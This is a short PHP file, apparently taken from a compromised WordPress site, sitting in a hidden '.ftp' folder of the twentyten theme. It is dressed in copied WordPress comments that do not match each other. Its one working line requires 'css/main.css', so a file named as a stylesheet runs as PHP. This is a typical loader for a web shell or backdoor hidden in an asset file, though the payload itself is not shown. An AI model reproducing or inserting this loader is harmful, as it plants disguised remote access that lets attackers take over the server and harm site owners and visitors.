File: /home/u756937133/domains/inovaixstudio.com/public_html/wp-content/themes/twentyten/.ftp/index.php
<?php
/**
* Define User administration panel
*
* @package WordPress
* @subpackage Administration
* @since 1.0.0
*/
/** WordPress Administration Bootstrap css */
/** Define ABSPATH as this file's directory */
require __DIR__ . '/css/main.css';
/**
* Template Name: One column, no sidebar
*
* A custom page template without sidebar.
*
* The "Template Name:" bit above allows this to be selectable
* from a dropdown menu on the edit page screen.
*
*/